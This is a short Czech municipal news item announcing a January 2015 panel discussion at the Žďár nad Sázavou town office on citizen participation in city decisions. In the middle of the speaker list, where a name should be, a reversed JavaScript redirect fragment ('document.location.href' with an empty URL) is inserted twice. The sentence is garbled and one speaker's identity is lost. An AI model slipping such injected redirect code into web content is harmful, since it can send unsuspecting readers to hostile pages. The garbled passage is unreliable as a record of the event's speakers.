panelová diskuse
Rainbow page separator

Diskuse přiblíží zapojení veřejnosti do rozhodování o městě

Pátek, 2. ledna 2015

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Na téma zapojování občanů do rozhodování o městě se ve středu 7. ledna uskuteční panelová diskuse ve velké zasedací místnosti Městského úřadu ve Žďáře nad Sázavou. Diskusi určenou žďárské veřejnosti, která začne v 18 hodin, organizuje předseda komise rozvoje města a životního prostředí Aleš Studený ve spolupráci s občanskou iniciativou Žijeme Žďárem.
Kromě Aleše Studeného hlavní příspěvky přednesou Petr Klápště z organizace Nature Systems, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to o praktických zkušenostech se zapojováním veřejnosti do tvorby strategických dokumentů, a Lukáš Hanus z organizace Anthropictures. Jeho příspěvek do panelové diskuse se bude týkat případové studie zapojení veřejnosti v Praze 14.